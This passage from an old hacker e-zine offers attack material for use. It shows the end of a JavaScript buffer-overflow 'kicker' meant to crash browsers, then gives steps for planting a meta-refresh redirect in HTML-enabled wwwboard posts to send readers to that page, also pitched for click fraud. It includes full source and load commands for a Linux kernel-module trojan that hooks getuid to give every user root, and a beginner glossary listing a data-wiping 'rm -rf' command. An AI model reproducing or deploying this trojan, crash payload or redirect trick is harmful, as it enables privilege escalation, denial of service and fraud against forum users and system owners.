AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
</SCRIPT>
<CENTER><P><HR><CENTER><P>
</html>
</body>
It is a buffer overflow done in javascript. I found it on a webpage
somewhere and i do not remember where so i am very sorry to the person
that wrote it that i cannot list your name here cause i found this a
while ago. Sometimes this kicker doesn't work. But we know that his
board supports HTML so you can input this script that will redirect the
person to another page containing the script.
Input this into the message area:
<html>
<head>
<meta http-equiv="refresh" content="1; URL=kicker.html">
</head>
<body>
Redirecting.....
</body></html>
The kicker is located at the page so when the user wants to read your
post, it will redirect them to that page wich contains that JavaScript
code. I would reccomend just putting that refresh tag instead of the
JavaScript tag cause the Matt Wright wwwboard comes with JavaScript
turned off or as the defualt. So the refresh would work better and would
have more of a chance of it to work.
This doesn't just work with Matt Wright's wwwboards, but really any
wwwboards that support HTML. It is just that i tested and figured out
how this worked on a Matt Wright wwwboard.
This is also a good trick if you have a sponser that pays by the click,
just redirect them to your sponser....
Lord Oak
lordoak@thepoison.org
------------------------------
2.03 --=\\all-root.c.txt\\=--
/*
* A kernel trojan (basic linux kernel module)
*
* Description: gives all users root
*
* coded by fred_ | blasphemy
*
* Compile: gcc -c -O3 all-root.c
* Load: insmod all-root.o
* Unload: rmmod all-root
*
* email: cornoil@netscape.net
*/
#define MODULE
#define __KERNEL__
#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <asm/fcntl.h>
#include <asm/errno.h>
#include <linux/types.h>
#include <linux/dirent.h>
#include <sys/mman.h>
#include <linux/string.h>
#include <linux/fs.h>
#include <linux/malloc.h>
extern void *sys_call_table[];
int (*orig_getuid)();
int give_root()
{
int x;
if (current->uid != 0) {
current->uid = 0;
current->gid = 0;
current->euid = 0;
current->egid = 0;
}
return 0;
}
int init_module(void)
{
orig_getuid = sys_call_table[SYS_getuid];
sys_call_table[SYS_getuid] = give_root;
return 0;
}
void cleanup_module(void)
{
sys_call_table[SYS_getuid] = orig_getuid;
}
------------------------------
<!-- 3.00 - Misc //-->
3.01 --=\\Neophyte Vocab\\=--
Here is a list of vocab that I made up for the newbies. You should probably learn this
if you are taking into consideration of being a 'computer h4x0r'. This is probably
where you should start and the first thing you should learn before anything else. I put
them in alphabetical order (finally learned how to do that!)
*Words & Descriptions:
31337 - see elite.
box - basically the OS or your computer.
buffer overflow - tries to 'overflow' some part of a server (see exploit & server).
dns - domain name server. Changes xx.xx.xxx.x to yourdomain.com (brief description).
dos - denial of service; something to slow a computer down (see nuke & ping).
computer - a television set with buttons and a rodent attached to it.
elite - the best at something who can make no mistakes at that something.
exploit - a security hole (in a server, web browser, anything).
ftp - file transfer protocol. Used to transer files (upload and/or download).
ftpd - ftp daemon (see ftp server & ftp).
ftp server - a server used to allows people to ftp to it (see ftp).
http - hypertext tranfser protocol. Allows you to view the persons webpage.
httpd - http daemon (see http & http server).
http server - a server that allows people to surf/view your site.
lamer - someone that tries to understand hacking and doesn't.
linux - an operating system that is like a "sub-operating system" of unix (see unix).
local exploit - an exploit that only works on 127.0.0.1 or "local host" (see exploit).
nuke - sends large packets to a computer causing a dos (see dos).
passwd - where all of the usernames and passwords are stored on a unix box (see unix).
passwd cracker - program used for cracking passwd files (see passwd & wordlist).
ping - sends 'x' number of packets to a computer and sees how fast they get there.
port scanner - program used for scanning various ports on a computer (see computer).
remote exploit - an exploit that can be used on any IP (see exploit).
rm -rf */ - unix command to delete everything on the server (see unix).
root - the username to a unix box. The person that has super user privlages.
script kiddie - someone that uses other peoples exploits or that weren't made by them.
server - where you go when you type in a site URL and upload to a site (basic descrip.)
shell account - a user account on a unix box (see unix).
unix - the operating system that MOST servers are run on (see server).
warez - giving away or re-selling already used copyrighted material.
windowsNT - another operating system that a lot of servers run on (see server).
wordlist - file w/ generated words, for cracking passwd files (see passwd cracking).
*Sayings & Descriptions:
I like your computer - means he likes your rodent/rat.
I got root - means someone gained root on a server.
I got a shell account - means someone got a user account on a unix server/computer.
I used the IMAPD exploit - means that he used the IMAPD security glitch to gain access.
Ok I hope your starting to understand the 'sayings' and how to understand the vocab
when they are put into sentances.
*Programs & misc:
passwd cracking - John the Ripper, pass crack
port scanner - 7th Sphere port scanner, Hackers Utility
wordlist generators - Dictionary Generator v1.0 (dic-gen), passlist
shell accounts - www.cyberspace.org, www.shellyeah.com, www.freeshells.net
All of these programs can be found on my site (www.thepoison.org), and a lot more of
them. These are just some of the programs that I use when I am in windows and to lazy
to reboot into RH5.2 (RedHat 5.2).
Lord Oak
lordoak@thepoison.org
------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
. Quote #3- .
. .
. "I needed the DOS prog so I could impress my NY Times slut..." .
. -JayPee .
. .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
_| _|
_| _| _| _| _| _| _| _|
_| _| _| _|_| _| _|_| _| _|
_| _|_|_|_| _| _| _| _| _| _| _|
_| _| _| _| _|_| _| _|_| _|
_| _| _| _| _| _| _| _|
_| Antidote is an HNN Affiliate _|
_| http://www.hackernews.com _|
_| _|
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
*ALL* ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission
is needed before using.
